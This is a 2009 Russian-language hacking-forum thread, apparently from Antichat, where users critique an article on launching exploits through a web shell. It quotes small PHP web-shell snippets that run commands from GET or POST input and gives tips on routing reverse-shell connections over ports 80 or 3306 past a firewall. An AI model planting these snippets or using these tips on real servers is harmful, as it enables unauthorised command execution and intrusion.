30.10.2009, 16:14
|
|
Новичок
Регистрация: 23.07.2008
Сообщений: 5
С нами:
9368397
Репутация:
0
|
|
Идея стара как мир =]
Последний раз редактировалось PowerWMZ; 30.10.2009 в 16:19..
|
|
|
30.10.2009, 16:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
Сообщение от PowerWMZ
Идея стара как мир =]
Возможно, но я уверен не все знали об этом
__________________
BlackHat. MoDL
|
|
|
|
30.10.2009, 17:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами:
10139366
Репутация:
1502
|
|
Ого, а запуск сплоитов из-под веба, оказалось, было таким приватным умением? 
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
30.10.2009, 20:15
|
|
Голос разума
Регистрация: 27.09.2006
Сообщений: 529
С нами:
10326626
Репутация:
1617
|
|
Димыч , а ты знаешь толк в изращениях , а если честно ты че курил когда это писал ?
это чюдо
echo `$row['comment']`;
выдаст .... хотя нет, это чудо вообще ниxуя не выдаст.. ибо в строку нельзя так вставлять переменную это раз, надо юзать {$row['comment']} да и в таких кавычках это вообще не прокатит ``.
ладно если опустить баги с кавычками то тя получается конструкция перед которой я снимаю шляпу.
echo shell_exec(eval($_POST['e']));
p.s. Все быстро записали себе этот код в блокнот!!
Сорри но статья - шлак
p.p.s Интересно а что же должно быть в E?
наверно
echo('id');
для просмотра ID
p.p.p.s Вследующий раз бери водку или пиво ,и никаких наркотиков )!
__________________
Бойтесь своих желаний. Они могут исполниться....
...О-о-о-о, ушами не услышать, глазами не понять!
Последний раз редактировалось SQLHACK; 30.10.2009 в 20:18..
|
|
|
|
30.10.2009, 21:01
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от L I G A
выдаст,если елемент массива $row с индексом сomment - будет иметь значение какой-либо команды:
PHP код:
<?php
$output = `$_GET[c]`;
?>
юзать так:
Код:
$_SERVER[SCRIPT_NAME]?c=regedit
А при чем здесь метод Димыча? прр чем здесь твой предыдущий пост?
__________________
Карфаген должен быть разрушен...
|
|
|
|
30.10.2009, 21:16
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
нет, не ближе у него
eval($_POST['e']);
причем он думает, что в переменную e что-то будет передаваться, и потом исполняться как системная комманда
З.Ы. да и вобще, зачем ты тут постишь очевидные вещи?
Димыч и ты говорили про:
Код:
<?php
$row[comment]='eval($_POST[\'e\']);';
echo `$row[comment]`;
?>
__________________
Карфаген должен быть разрушен...
|
|
|
|
30.10.2009, 21:59
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
Прочел статью от начала до конца.
В принципе нормально, но для общего развития, так как в статье указан пример, в котором все так круто порутилось, что аж ппц
На самом то деле очень редко так фартит.Часто ядро оказуется патченым, но сейчас не об этом. Бывает, что на серваке попросту не установлен gcc/g++, или не хватает библиотек, приходится компилить на своей тачке или на шелле, или же лить это все туда..
Ну а вообще автору +1.
Последний раз редактировалось Ins3t; 30.10.2009 в 22:02..
|
|
|
|
30.10.2009, 22:26
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
С нами:
9231812
Репутация:
40
|
|
Да, с этим
$row[comment]=eval($_POST['e']);
echo `$row['comment']`;
он попутал... |
|
|
|
30.10.2009, 22:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
С нами:
9521666
Репутация:
1695
|
|
Но что делать, если и тут всё обламывает файервол?
Как-то столкнулся с тем что не мог сделать бекконнект ... видимо фаервол разрешал исходящие соединения только для ESTABLISHED (ибо веб работал), a также на обычные порты 80, 3306.
Поэтому могу посоветовать, если не получается подключиться бекконектом на какой-нить 9999 порт, попробовать использовать порт 80, 3306 или другой системный.
В моем случае сработало!
|
|
|
|
30.10.2009, 22:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
Ужас какое наркоманство, непомню что на меня так повлияло, видмо зеленый чай, который чего то черным был))
Вот такое извращение, хотя оказывается пашет:
PHP код:
echo shell_exec(eval('system("ls");'));
В серьёз не воспринимать ))))
__________________
BlackHat. MoDL
Последний раз редактировалось Dimi4; 30.10.2009 в 22:45..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
